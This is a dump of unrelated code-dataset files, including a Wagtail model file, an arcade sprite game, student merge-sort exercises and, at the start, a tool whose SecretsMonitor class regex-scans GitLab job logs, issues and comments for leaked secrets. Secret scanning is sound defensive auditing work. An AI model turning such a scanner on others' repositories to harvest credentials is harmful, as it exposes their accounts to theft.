'certificate to verify TLS connections. Provide a fully qualified path to the dynamic '\n 'cert. Example: /Users//owasp_zap_root_ca.cer.')\n parser.add_argument('-l', '--logfile', type=str, action='store',\n help='Will APPEND all output to specified file.')\n\n constants.Banner.render()\n\n if len(sys.argv) == 1:\n parser.print_help(sys.stderr)\n sys.exit(1)\n\n self.parsed_args = parser.parse_args()\n if self.parsed_args.proxy and not self.parsed_args.cert:\n parser.error('If you specify a proxy address, you must also specify a dynamic certificate in order to '\n 'decrypt TLS traffic with the --cert switch.')\n\n instance = None\n\n def __init__(self):\n if not Arguments.instance:\n Arguments.instance = Arguments.__Arguments()\n\n def __getattr__(self, name):\n return getattr(self.instance.parsed_args, name)\n\n\nJobLog = namedtuple('JobLog', 'ident web_url trace')\nIssue = namedtuple('Issue', 'ident web_url description')\nMergeRequest = namedtuple('MergeRequest', 'ident web_url description')\nComment = namedtuple('Comment', 'comment_type parent_url comment_body')\nSecret = namedtuple('Secret', 'secret_type secret url')\n\n\nclass SecretsMonitor:\n\n def __init__(self):\n with open(os.path.join(os.path.dirname(__file__), \"../regexes.json\")) as f:\n self.regexes = json.loads(f.read())\n\n self.regex_names = self.__regex_names(self.regexes)\n self.master_regex = self.__compile_regexes(self.regexes)\n\n def __regex_names(self, regexes):\n \"\"\" Returns a dict containing regex names keyed by group\n \"\"\"\n return {self.__group(i): name for i, name in enumerate(regexes)}\n\n def __compile_regexes(self, regexes):\n \"\"\" Concatenates all regexes into one big, compiled regex.\n \"\"\"\n parts = []\n for i, name in enumerate(regexes):\n group = self.__group(i)\n regex = regexes[name]\n parts.append(f'(?P<{group}>{regex})')\n\n return re.compile('|'.join(parts))\n\n def __group(self, i):\n return f'group_{i}'\n\n def 
sniff_secrets(self, content):\n if not content:\n return []\n\n secrets = []\n for web_url, raw_data in content.items():\n found_secrets = self.__get_secrets(raw_data)\n for secret_type, secret in found_secrets.items():\n secrets.append(Secret(secret_type, secret, web_url))\n return secrets\n\n def __get_secrets(self, content):\n result = {}\n if not content:\n return result\n match = self.master_regex.search(content)\n if not match:\n return result\n for group, value in match.groupdict().items():\n if value is None:\n continue\n name = self.regex_names[group]\n result[name] = value\n return result\n","sub_path":"utilities/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":6449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162278642","text":"# dlfile.py\n\nimport urllib.request\n\ndef downloadfile(url, filename):\n try:\n with urllib.request.urlretrieve(url, filename) as response, open(filename, \"wb\") as file:\n data = response.read()\n file.write(data)\n except AttributeError:\n print(\"Got an AttributeError\")\n \n\nurl = input(\"URL: \")\nfilename = url.split(\"/\")[-1]\nprint(filename)\ndownloadfile(url, filename)\n","sub_path":"dlfily.py","file_name":"dlfily.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"415118436","text":"import rpyc\nfrom rpyc.utils.helpers import classpartial\nfrom rpyc.utils.server import ThreadedServer\n\nimport threading\nimport logging\n\nimport sys\nimport os\nimport time\n\nimport signal\n\n\nclass AppClient:\n\n class PortThread(threading.Thread):\n\n class Port(rpyc.Service):\n def __init__(self, app):\n super().__init__()\n self._app = app\n\n def on_connect(self, conn):\n # code that runs when a connection is created\n # (to init the service, if needed)\n pass\n\n def on_disconnect(self, conn):\n # code that runs after the connection has already closed\n # (to finalize the service, if needed)\n pass\n\n def exposed_updateServiceState(self, state):\n self._app.setServiceState(state)\n logging.getLogger().debug('Status updated! 
Changed to: '+ str(state))\n\n def __init__(self, app):\n threading.Thread.__init__(self)\n self._app = app\n\n def run(self):\n logging.getLogger().debug('PortThread: Starting thread...')\n self.startPort()\n logging.getLogger().debug('PortThread: Thread finished')\n\n def startPort(self):\n portConstructor = classpartial(self.Port, self._app)\n self._portServer = ThreadedServer(portConstructor, port=18870)\n self._portServer.start()\n\n def closePort(self):\n self._portServer.close()\n\n def __init__(self):\n self._serviceState = None\n\n self._portThread = self.PortThread(self)\n self._portThread.start()\n\n logging.getLogger().info('Started client with port thread')\n\n def subscribeToService(self):\n # polaczenie z usluga\n self._servicePort = rpyc.connect(\"localhost\", 18860)\n self._servicePort.root.register_observer(18870, 'testClient')\n self._serviceState = self._servicePort.root.get_state()\n logging.getLogger().info(\"Present state: {}\".format(self._serviceState))\n # zamykam wychodzace polaczenie z usluga\n #self._servicePort.close()\n\n def unsubscribeFromService(self):\n # polaczenie z usluga\n #self._servicePort = rpyc.connect(\"localhost\", 18860)\n self._servicePort.root.remove_observer('testClient')\n # zamykam wychodzace polaczenie z usluga\n self._servicePort.close()\n\n def setServiceState(self, state):\n self._serviceState = state\n\n def closeApp(self):\n logging.getLogger().info('Zamykam polaczenie')\n self.unsubscribeFromService()\n # zamknij polaczenia przychodzace\n self._portThread.closePort()\n\n\nlogs = logging.getLogger()\nlogs.setLevel(logging.DEBUG)\nhandlerConsole = logging.StreamHandler()\nhandlerConsole.setLevel(logging.DEBUG)\nformatterMain = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n '%Y-%m-%d %H:%M:%S'\n)\nhandlerConsole.setFormatter(formatterMain)\nlogs.addHandler(handlerConsole)\n\n\n\napp = AppClient()\napp.subscribeToService()\n\n\nwhile True:\n nb = input('Type `q` to close: ')\n if nb == 'q':\n break\n\napp.closeApp()\n","sub_path":"winservicewatch/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"82512418","text":"# TO-DO: complete the helper function below to merge 2 sorted arrays\nfrom math import floor\n\n\ndef merge(arrA, arrB):\n elements = len(arrA) + len(arrB)\n merged_arr = []\n# merged_arr = [0] * elements\n\n # Your code here\n # compare first elements of arrA and arrB\n # remove the smaller from arrA or arrB and put into merged_arr\n while len(arrA) > 0 and len(arrB) > 0:\n if arrA[0] >= arrB[0]:\n merged_arr.append(arrB.pop(0))\n print(merged_arr)\n else:\n merged_arr.append(arrA.pop(0))\n print(merged_arr)\n\n # handle any leftover list elements\n while len(arrA) > 0:\n merged_arr.append(arrA.pop(0))\n while len(arrB) > 0:\n merged_arr.append(arrB.pop(0))\n\n return merged_arr\n\n\n# TO-DO: implement the Merge Sort function below USING RECURSION\n# split thearray here\ndef merge_sort(arr):\n # Your code here\n\n if len(arr) <= 1:\n return arr\n\n midpoint = floor(len(arr)/2)\n left = arr[:midpoint]\n right = arr[midpoint:]\n\n left = merge_sort(left)\n right = merge_sort(right)\n\n arr = merge(left, right)\n return arr\n\n\n# implement an in-place merge sort algorithm\ndef merge_in_place(arr, start, mid, end):\n # Your code here\n pointer1 = start+1\n if arr[start] <= arr[pointer1]:\n return arr\n return arr\n\n\ndef merge_sort_in_place(arr, l, r):\n # Your code 
here\n if len(arr) <= 1:\n return arr\n\n midpoint = floor((r-l)/2)\n merge_sort_in_place(arr, l, midpoint)\n merge_sort_in_place(arr, midpoint, r)\n\n merge_in_place(arr, l, midpoint, r)\n\n return arr\n\n\n# STRETCH: implement the Timsort function below\n# hint: check out https://github.com/python/cpython/blob/master/Objects/listsort.txt\n# def timsort(arr):\n# # Your code here\n#\n# return arr\n","sub_path":"src/recursive_sorting/recursive_sorting.py","file_name":"recursive_sorting.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"580239939","text":"from django.db import models\nfrom wagtail.core.models import Page, Orderable\nfrom wagtail.snippets.models import register_snippet\nfrom wagtail.search import index\nfrom modelcluster.models import ClusterableModel\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.admin.edit_handlers import (\n FieldPanel,\n MultiFieldPanel,\n InlinePanel,\n FieldRowPanel\n)\nfrom modelcluster.fields import ParentalKey, ParentalManyToManyField\nfrom django import forms\nfrom .enums import VehicleFeatureChoice, VehicleTypeChoice\nfrom wagtailmetadata.models import MetadataMixin\nfrom django.utils.translation import ugettext_lazy\n\nclass Place(index.Indexed, ClusterableModel):\n name = models.CharField(max_length = 255, null = False, blank = False, unique=True)\n details = models.TextField(null = False, blank = False, help_text = \"Add place details\")\n\n duration_of_visit = models.DurationField(null = True,\n blank = True,\n default = '00:00:00',\n verbose_name = ('Duration Of Visit (HH:MM:SS)'),\n help_text = ('[DD] [HH:[MM:]]ss[.uuuuuu] format')\n )\n\n map_icon = models.ForeignKey(\n \"wagtailimages.Image\",\n null = True,\n blank = True,\n on_delete = models.SET_NULL,\n related_name = \"+\"\n )\n\n trip_types = ParentalManyToManyField('TripType', blank = False)\n location_tags = ParentalManyToManyField('LocationTag', blank = False)\n panels = [\n FieldPanel(\"name\"),\n FieldPanel(\"details\"),\n FieldPanel(\"duration_of_visit\"),\n ImageChooserPanel(\"map_icon\"),\n MultiFieldPanel([\n InlinePanel(\"place_images\", min_num=1),\n ], heading=\"Images\" ),\n FieldPanel('trip_types', widget = forms.CheckboxSelectMultiple),\n FieldPanel('location_tags', widget = forms.CheckboxSelectMultiple),\n ]\n\n search_fields = [\n index.SearchField('name', partial_match = True),\n ]\n\n def __str__(self):\n return self.name\n\nregister_snippet(Place)\n\nclass PlaceImages(Orderable):\n place = ParentalKey('Place',\n related_name = \"place_images\",\n null = False,\n blank = False\n )\n image = models.ForeignKey(\n \"wagtailimages.Image\",\n null = True,\n blank = False,\n on_delete = models.CASCADE,\n related_name = \"+\"\n )\n\n\n panels = [\n ImageChooserPanel(\"image\"),\n ]\n\n \"\"\"def get_absolute_url(self):\n\n Returns absolute url for banner_image to generate image site map\n\n kwargs = {'slug': self.slug}\n return reverse('places.detail', kwargs=kwargs)\"\"\"\n\n def place_image_url(self):\n \"\"\"\n Returns the banner_image url for XML images sitemap.\n \"\"\"\n url = settings.MEDIA_URL + self.image.file.name\n print(self.image.file.name)\n return url if self.image else ''\n\n def place_image_title(self):\n \"\"\"\n Returns the banner_image title for XML images sitemap.\n \"\"\"\n return self.image.title if self.image else ''\n\n class Meta:\n unique_together = (\n ('place', 'image'),\n )\n\n\nclass LocationTag(models.Model):\n tag = 
models.CharField(max_length = 255, blank = False, null = False, unique=True, help_text = \"Location tag\")\n\n panels = [\n FieldPanel(\"tag\"),\n ]\n\n def __str__(self):\n return self.tag\n\n class Meta:\n verbose_name = \"Location Tag\"\n verbose_name_plural = \"Location Tags\"\n\n\nregister_snippet(LocationTag)\n\nclass TripType(models.Model):\n trip_type = models.CharField(max_length = 255, blank = False, null = False, unique=True, help_text = \"Trip type\")\n\n panels = [\n FieldPanel(\"trip_type\"),\n ]\n\n def __str__(self):\n return self.trip_type\n\n class Meta:\n verbose_name = \"Trip Type\"\n verbose_name_plural = \"Trip Types\"\n\n\nregister_snippet(TripType)\n\nclass FareTable(models.Model):\n vehicle_type = models.CharField(max_length = 50,\n blank = False,\n null = False,\n choices = [(type.value, type.name.replace(\"_\", \" - \").upper()) for type in VehicleTypeChoice],\n default = VehicleTypeChoice.hatchback\n )\n\n model = models.CharField(max_length = 255, blank = False, null = False)\n seater = models.PositiveSmallIntegerField(null = False, default = 0)\n per_km_rate = models.PositiveSmallIntegerField(null = False, default = 0, verbose_name = ('Per km rate (\u20B9)'))\n vehicle_feature = models.CharField( max_length = 20,\n choices = [(feature.value, feature.name.replace(\"_\", \" - \").upper()) for feature in VehicleFeatureChoice],\n default = VehicleFeatureChoice.AC\n )\n\n panels = [\n FieldPanel(\"vehicle_type\"),\n FieldPanel(\"model\"),\n FieldPanel(\"seater\"),\n FieldPanel(\"per_km_rate\"),\n FieldPanel(\"vehicle_feature\"),\n ]\n\n def __str__(self):\n return self.vehicle_type +' - '+ self.model\n\n class Meta:\n verbose_name = \"Fare\"\n verbose_name_plural = \"Fares\"\n\n\nregister_snippet(FareTable)\n\n\nclass PopularRoutes(ClusterableModel):\n region = models.CharField(max_length = 255, blank = False, null = True, unique=True)\n\n panels = [\n FieldPanel(\"region\"),\n MultiFieldPanel([\n InlinePanel(\"region_routes\", min_num=1),\n ], heading=\"Popular Routes\"),\n ]\n\n class Meta:\n verbose_name = \"Popular Route\"\n verbose_name_plural = \"Popular Routes\"\n\n def __str__(self):\n return self.region\n\nregister_snippet(PopularRoutes)\n\nclass RouteLink(Orderable):\n popular_route = ParentalKey('PopularRoutes',\n related_name = \"region_routes\",\n null = False,\n blank = False\n )\n name = models.CharField(max_length = 255, blank = False, null = False, unique = True)\n url = models.URLField()\n\n panels = [\n FieldRowPanel([\n FieldPanel('name', classname=\"col6\"),\n FieldPanel('url', classname=\"col6\"),\n ]),\n ]\n class Meta:\n unique_together = (\n ('popular_route', 'name'),\n )\n\nclass PageMetadataMixin(MetadataMixin, models.Model):\n \"\"\"An implementation of MetadataMixin for Wagtail pages.\"\"\"\n search_image = models.ForeignKey(\n \"wagtailimages.Image\",\n null=True,\n blank=True,\n related_name='+',\n on_delete=models.SET_NULL,\n verbose_name=ugettext_lazy('Search image')\n )\n\n promote_panels = [\n MultiFieldPanel([\n FieldPanel('slug'),\n FieldPanel('seo_title'),\n FieldPanel('show_in_menus'),\n FieldPanel('search_description'),\n ImageChooserPanel('search_image'),\n FieldPanel('canonical_url'),\n FieldPanel('robots_tag')\n\n ], ugettext_lazy('Common page configuration')),\n ]\n\n def get_meta_url(self):\n return self.full_url\n\n def get_meta_title(self):\n return self.seo_title or self.title\n\n def get_meta_description(self):\n return self.search_description\n\n def get_meta_image(self):\n return self.search_image\n\n def 
get_canonical_url(self):\n return self.canonical_url\n\n def get_robots_tag(self):\n return self.robots_tag\n\n class Meta:\n abstract = True\n","sub_path":"outstation/apps/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"636085137","text":"\"\"\" Lab 8 - Sprites \"\"\"\r\n\r\nimport arcade\r\nimport math\r\nfrom random import randrange\r\n\r\n# --- Constants ---\r\nSCREEN_WIDTH = 800\r\nSCREEN_HEIGHT = 600\r\n\r\n\r\nclass MyGame(arcade.Window):\r\n \"\"\" Our Custom Window Class\"\"\"\r\n\r\n def __init__(self):\r\n \"\"\" Initializer \"\"\"\r\n super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, \"Lab 8 - Sprites\")\r\n self.set_update_rate(1 / 60)\r\n # Player sprite and score\r\n self.player = arcade.Sprite(\"Sprites/Particle.png\", 1)\r\n self.score = 0\r\n # Good particles variables\r\n self.good = arcade.SpriteList()\r\n self.good_max_amount = 10\r\n self.good_x = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n self.good_y = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n # Bad particles variables\r\n self.bad = arcade.SpriteList()\r\n self.bad_max_amount = 10\r\n self.bad_x = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n self.bad_y = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n # Sounds\r\n self.good_sound = arcade.Sound(\"Sounds/270304__littlerobotsoundfactory__collect-point-00.wav\")\r\n self.bad_sound = arcade.Sound(\"Sounds/270332__littlerobotsoundfactory__hit-03.wav\")\r\n # Background (I didn't add one)\r\n pass\r\n # Mouse (Since we move the player with the mouse, we'll make the cursor invisible)\r\n self.set_mouse_visible(False)\r\n\r\n def setup(self):\r\n # Create good particles\r\n for i in range(self.good_max_amount):\r\n self.good.append(arcade.Sprite(\"Sprites/Proton.png\", 1, center_x=randrange(SCREEN_WIDTH),\r\n center_y=randrange(SCREEN_HEIGHT)))\r\n self.good_x[i] = randrange(-4, 4, 1)\r\n self.good_y[i] = randrange(-4, 4, 1)\r\n # Create bad particles\r\n for i in range(self.bad_max_amount):\r\n self.bad.append(arcade.Sprite(\"Sprites/Electron.png\", 1, center_x=randrange(SCREEN_WIDTH),\r\n center_y=randrange(SCREEN_HEIGHT)))\r\n self.bad_x[i] = randrange(-4, 4, 1)\r\n self.bad_y[i] = randrange(-4, 4, 1)\r\n\r\n def on_draw(self):\r\n \"\"\"Function to draw on screen\"\"\"\r\n arcade.start_render()\r\n self.player.draw()\r\n self.good.draw()\r\n self.bad.draw()\r\n arcade.draw_text(\"Score: \" + str(self.score), 0, 0, arcade.color.WHITE, font_size=20)\r\n\r\n def on_update(self, delta_time: float):\r\n \"\"\"Here goes the game logic\"\"\"\r\n self.upd_particles()\r\n self.handle_collisions(self.good, self.good_x, self.good_y, self.good_sound, 1)\r\n self.handle_collisions(self.bad, self.bad_x, self.bad_y, self.bad_sound, -1)\r\n\r\n @staticmethod\r\n def pos_update(sprite: arcade.Sprite, speed_x, speed_y):\r\n \"\"\"Function that updates the position of a sprite WITHIN the screen\"\"\"\r\n # x axis\r\n sprite.center_x += speed_x\r\n if sprite.center_x >= SCREEN_WIDTH:\r\n sprite.center_x = 1\r\n elif sprite.center_x <= 0:\r\n sprite.center_x = SCREEN_WIDTH - 1\r\n # y axis\r\n sprite.center_y += speed_y\r\n if sprite.center_y >= SCREEN_HEIGHT:\r\n sprite.center_y = 1\r\n elif sprite.center_y < 0:\r\n sprite.center_y = SCREEN_HEIGHT - 1\r\n\r\n def upd_particles(self):\r\n \"\"\"Function that updates every particle\"\"\"\r\n i = 0\r\n for elem in self.good:\r\n self.pos_update(elem, self.good_x[i], self.good_y[i])\r\n i += 1\r\n i = 0\r\n for elem in self.bad:\r\n 
self.pos_update(elem, self.bad_x[i], self.bad_y[i])\r\n i += 1\r\n\r\n def handle_collisions(self, s_list: arcade.SpriteList, x: list, y: list, sound: arcade.Sound, score_mod: int):\r\n \"\"\"Function that detects and handles collisions\"\"\"\r\n i = 0\r\n for elem in s_list:\r\n if elem.collides_with_sprite(self.player):\r\n self.score += score_mod\r\n elem.center_x, elem.center_y = randrange(SCREEN_WIDTH), randrange(SCREEN_HEIGHT)\r\n x[i] = randrange(-4, 4, 1)\r\n y[i] = randrange(-4, 4, 1)\r\n sound.play()\r\n # advance the index so each sprite keeps its own velocity entry\r\n i += 1\r\n\r\n def on_mouse_motion(self, x: float, y: float, dx: float, dy: float):\r\n \"\"\"Player movement\"\"\"\r\n self.player.center_x = x\r\n self.player.center_y = y\r\n\r\n\r\ndef main():\r\n window = MyGame()\r\n window.setup()\r\n arcade.run()\r\n\r\n\r\nmain()\r\n","sub_path":"lab08-sprites/lab08-sprites.py","file_name":"lab08-sprites.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"239093390","text":"import openpyxl\nimport random\n\nfrom openpyxl.workbook import workbook\n\n\"\"\"\n Read an Excel file\n\"\"\"\n\nimport openpyxl\n\npath = '/Users/houjianan/Documents/GitHub/Python/Basic/Excel/source/第二批车辆投放及商家入驻情况.xlsx'\nwb = openpyxl.load_workbook(path)\n# Get all worksheet names\nnames = wb.sheetnames\n# wb.get_sheet_by_name(name) is deprecated; use wb[name] to get a specific worksheet\nsheet = wb[names[0]]\n# Get the maximum row count\nmaxRow = sheet.max_row\n# Get the maximum column count\nmaxColumn = sheet.max_column\n# Get the currently active sheet\ncurrent_sheet = wb.active\n# Get the name of the currently active sheet\ncurrent_name = sheet.title\n# Access a Cell object by name; read its value via the value attribute\na1 = sheet['A1'].value\n# Locate data by row and column\na12 = sheet.cell(row=1, column=2).value\n# Get the column letter\ncolumn_name = openpyxl.utils.cell.get_column_letter(1)\n# Convert a column letter to a number; the argument is case-insensitive\ncolumn_name_num = openpyxl.utils.cell.column_index_from_string('a')\n# Get one column of data; sheet.iter_rows() yields all the rows\n\"\"\"\nsheet.iter_rows() yields one tuple of Cell objects per row.\n\"\"\"\n# print(sheet.iter_cols)\nSN = []\nindex = 18010124000\nmin_row = 3\nfor one_column_data in sheet.iter_rows(min_row=min_row):\n A = one_column_data[0]\n if isinstance(A.value, int):\n A1 = str(A.value)[-3:]\n # print(A1)\n index += 1000\n item = index + int(A1)\n # print(item)\n sheet.cell(row=min_row, column=4, value=item)\n min_row += 1\n else:\n print(\"==\")\n\nwb.save(path)\nprint(\"Save complete\")\n\n# for row_index, row_item in enumerate(data):\n\n# for col_index, col_item in enumerate(row_item):\n# # Write the cell\n# sheet.cell(row=row_index+1, column=col_index+1, value=col_item)\n\n# # Write to the Excel file; if no file exists at path it is created automatically\n# workbook.save(path)\n# print('Write succeeded')\n\n# Get one row of data; sheet.iter_cols() yields all the columns\n\"\"\"\nsheet.iter_cols() yields one tuple of Cell objects per column.\n\"\"\"\n# for one_row_data in sheet.iter_cols():\n# print(one_row_data[1].value, end=\"\\t\")\n\n# print(\"row = {}, column = {}\".format(maxRow, maxColumn))\n\n\n# def write_to_excel(path: str, sheetStr, info, data):\n\n# # Instantiate a workbook object\n# workbook = openpyxl.Workbook()\n# # Activate a sheet\n# sheet = workbook.active\n# # Set a title for the sheet\n# sheet.title = sheetStr\n\n# # Add a header row (omit if no header is needed)\n# data.insert(0, list(info))\n# # Iterate over the data\n# for row_index, row_item in enumerate(data):\n\n# for col_index, col_item in enumerate(row_item):\n# # Write the cell\n# sheet.cell(row=row_index+1, column=col_index+1, value=col_item)\n\n# # Write to the Excel file; if no file exists at path it is created automatically\n# workbook.save(path)\n# print('Write succeeded')\n\n\n# if __name__ == '__main__':\n\n# # Data structure 1: path - the file path\n# path = r'第二批车辆投放及商家入驻情况.xls'\n# # Data structure 1: the sheet name in the Excel file\n# sheetStr = '车辆-修改'\n\n# info = ['name', 'age', 'address']\n# # Data structure 1: the data\n# writeData = [['John Brown', 18, 'New York No. 
1 Lake Park']]\n\n# # Execute\n# write_to_excel(path, sheetStr, info, writeData)\n","sub_path":"开发相关/Python/Basic/Excel/exercise/第二批车辆投放及商家入驻情况.py","file_name":"第二批车辆投放及商家入驻情况.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"116237707","text":"REGISTER_REQUEST = 1\nREGISTER_RESPONSE = 2\nTOPOLOGY_UPDATE = 3\nKEEP_ALIVE = 4\nROUTE_UPDATE = 5\n\n#SERVER_IP = 'localhost'\n#SERVER_PORT = 5024\nSERVER_ID = 0\n\nclass CommandSDN(object):\n\n\tdef __init__(self, cmd, src, dest, data, length):\n\t\tself.cmd = cmd\n\t\tself.src = src\n\t\tself.dest = dest\n\t\tself.data = data\n\t\tself.len = length\n\t\treturn\n\nclass Tee(object):\n def __init__(self, *files):\n self.files = files\n def write(self, obj):\n for f in self.files:\n f.write(obj)\n","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"538131446","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n@Author: yangwenhao\n@Contact: 874681044@qq.com\n@Software: PyCharm\n@File: test_data_rand.py\n@Time: 2021/5/19 15:39\n@Overview:\n\"\"\"\n\nfrom __future__ import print_function\n\nimport argparse\nimport os\nimport os.path as osp\nimport sys\nimport time\n# Version conflict\nimport warnings\n\nimport numpy as np\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nfrom kaldi_io import read_mat\nfrom tensorboardX import SummaryWriter\nfrom tqdm import tqdm\n\nfrom Process_Data.Datasets.KaldiDataset import ScriptTrainDataset\nfrom Process_Data.audio_processing import ConcateNumInput_Test\nfrom logger import NewLogger\n\nwarnings.filterwarnings(\"ignore\")\n\nimport torch._utils\n\ntry:\n torch._utils._rebuild_tensor_v2\nexcept AttributeError:\n def _rebuild_tensor_v2(storage, storage_offset, size, stride, requires_grad, backward_hooks):\n tensor = torch._utils._rebuild_tensor(storage, storage_offset, size, stride)\n tensor.requires_grad = requires_grad\n tensor._backward_hooks = backward_hooks\n return tensor\n\n\n torch._utils._rebuild_tensor_v2 = _rebuild_tensor_v2\n\n# Training settings\nparser = argparse.ArgumentParser(description='PyTorch Speaker Recognition')\n\n# Data options\nparser.add_argument('--train-dir', type=str,\n default='/home/work2020/yangwenhao/project/lstm_speaker_verification/data/vox1/spect/dev_log',\n help='path to dataset')\n# parser.add_argument('--train-test-dir', type=str, required=True, help='path to dataset')\n# parser.add_argument('--valid-dir', type=str, required=True, help='path to dataset')\n# parser.add_argument('--test-dir', type=str, required=True, help='path to voxceleb1 test dataset')\nparser.add_argument('--log-scale', action='store_true', default=False, help='log power spectrogram')\nparser.add_argument('--exp', action='store_true', default=False, help='exp power spectrogram')\n\nparser.add_argument('--trials', type=str, default='trials', help='path to voxceleb1 test dataset')\nparser.add_argument('--train-trials', type=str, default='trials', help='path to voxceleb1 test dataset')\n\nparser.add_argument('--sitw-dir', type=str, help='path to voxceleb1 test dataset')\nparser.add_argument('--fix-length', action='store_true', default=True, help='need to make mfb file')\nparser.add_argument('--test-input', type=str, default='fix', choices=['var', 'fix'],\n help='batchnorm with instance norm')\nparser.add_argument('--random-chunk', nargs='+', 
type=int, default=[], metavar='MINCHUNK')\nparser.add_argument('--chunk-size', type=int, default=300, metavar='CHUNK')\nparser.add_argument('--num-frames', type=int, default=300, metavar='CHUNK')\n\nparser.add_argument('--remove-vad', action='store_true', default=False, help='using Cosine similarity')\nparser.add_argument('--extract', action='store_true', default=True, help='need to make mfb file')\nparser.add_argument('--shuffle', action='store_false', default=True, help='need to make mfb file')\n\nparser.add_argument('--nj', default=10, type=int, metavar='NJOB', help='num of job')\nparser.add_argument('--feat-format', type=str, default='kaldi', choices=['kaldi', 'npy'],\n help='number of jobs to make feats (default: 10)')\n\nparser.add_argument('--check-path', default='Data/test/',\n help='folder to output model checkpoints')\nparser.add_argument('--save-init', action='store_true', default=True, help='need to make mfb file')\nparser.add_argument('--resume',\n default='Data/test/checkpoint_10.pth', type=str,\n metavar='PATH',\n help='path to latest checkpoint (default: none)')\n\nparser.add_argument('--output-file',\n default='Data/test/rand_sequence.txt', type=str, metavar='PATH',\n help='path to latest checkpoint (default: none)')\n\nparser.add_argument('--start-epoch', default=1, type=int, metavar='N',\n help='manual epoch number (useful on restarts)')\nparser.add_argument('--epochs', type=int, default=20, metavar='E',\n help='number of epochs to train (default: 10)')\nparser.add_argument('--scheduler', default='multi', type=str,\n metavar='SCH', help='The optimizer to use (default: Adagrad)')\nparser.add_argument('--patience', default=2, type=int,\n metavar='PAT', help='patience for scheduler (default: 4)')\nparser.add_argument('--gamma', default=0.75, type=float,\n metavar='GAMMA', help='The optimizer to use (default: Adagrad)')\nparser.add_argument('--milestones', default='10,15', type=str,\n metavar='MIL', help='The optimizer to use (default: Adagrad)')\nparser.add_argument('--min-softmax-epoch', type=int, default=40, metavar='MINEPOCH',\n help='minimum epoch for initial parameter using softmax (default: 2')\nparser.add_argument('--veri-pairs', type=int, default=20000, metavar='VP',\n help='number of epochs to train (default: 10)')\n\n# Training options\n# Model options\nparser.add_argument('--model', type=str, help='path to voxceleb1 test dataset')\nparser.add_argument('--resnet-size', default=8, type=int,\n metavar='RES', help='The channels of convs layers)')\nparser.add_argument('--filter', type=str, default='None', help='replace batchnorm with instance norm')\nparser.add_argument('--filter-fix', action='store_true', default=False, help='replace batchnorm with instance norm')\n\nparser.add_argument('--input-norm', type=str, default='Mean', help='batchnorm with instance norm')\n\nparser.add_argument('--mask-layer', type=str, default='None', help='time or freq masking layers')\nparser.add_argument('--mask-len', type=int, default=20, help='maximum length of time or freq masking layers')\nparser.add_argument('--block-type', type=str, default='basic', help='replace batchnorm with instance norm')\nparser.add_argument('--relu-type', type=str, default='relu', help='replace batchnorm with instance norm')\nparser.add_argument('--transform', type=str, default=\"None\", help='add a transform layer after embedding layer')\n\nparser.add_argument('--vad', action='store_true', default=False, help='vad layers')\nparser.add_argument('--inception', action='store_true', default=False, help='multi 
size conv layer')\nparser.add_argument('--inst-norm', action='store_true', default=False, help='batchnorm with instance norm')\n\nparser.add_argument('--encoder-type', type=str, default='None', help='path to voxceleb1 test dataset')\nparser.add_argument('--channels', default='64,128,256', type=str, metavar='CHA', help='The channels of convs layers)')\nparser.add_argument('--feat-dim', default=64, type=int, metavar='N', help='acoustic feature dimension')\nparser.add_argument('--input-dim', default=257, type=int, metavar='N', help='acoustic feature dimension')\nparser.add_argument('--accu-steps', default=1, type=int, metavar='N', help='manual epoch number (useful on restarts)')\n\nparser.add_argument('--alpha', default=12, type=float, metavar='FEAT', help='acoustic feature dimension')\nparser.add_argument('--ring', default=12, type=float, metavar='RING', help='acoustic feature dimension')\n\nparser.add_argument('--kernel-size', default='5,5', type=str, metavar='KE', help='kernel size of conv filters')\nparser.add_argument('--context', default='5,3,3,5', type=str, metavar='KE', help='kernel size of conv filters')\n\nparser.add_argument('--padding', default='', type=str, metavar='KE', help='padding size of conv filters')\nparser.add_argument('--stride', default='2', type=str, metavar='ST', help='stride size of conv filters')\nparser.add_argument('--fast', action='store_true', default=False, help='max pooling for fast')\n\nparser.add_argument('--cos-sim', action='store_true', default=False, help='using Cosine similarity')\nparser.add_argument('--avg-size', type=int, default=4, metavar='ES', help='Dimensionality of the embedding')\nparser.add_argument('--time-dim', default=1, type=int, metavar='FEAT', help='acoustic feature dimension')\nparser.add_argument('--embedding-size', type=int, default=128, metavar='ES',\n help='Dimensionality of the embedding')\nparser.add_argument('--batch-size', type=int, default=128, metavar='BS',\n help='input batch size for training (default: 128)')\nparser.add_argument('--input-per-spks', type=int, default=384, metavar='IPFT',\n help='input sample per file for testing (default: 8)')\nparser.add_argument('--num-valid', type=int, default=5, metavar='IPFT',\n help='input sample per file for testing (default: 8)')\nparser.add_argument('--test-input-per-file', type=int, default=4, metavar='IPFT',\n help='input sample per file for testing (default: 8)')\nparser.add_argument('--test-batch-size', type=int, default=4, metavar='BST',\n help='input batch size for testing 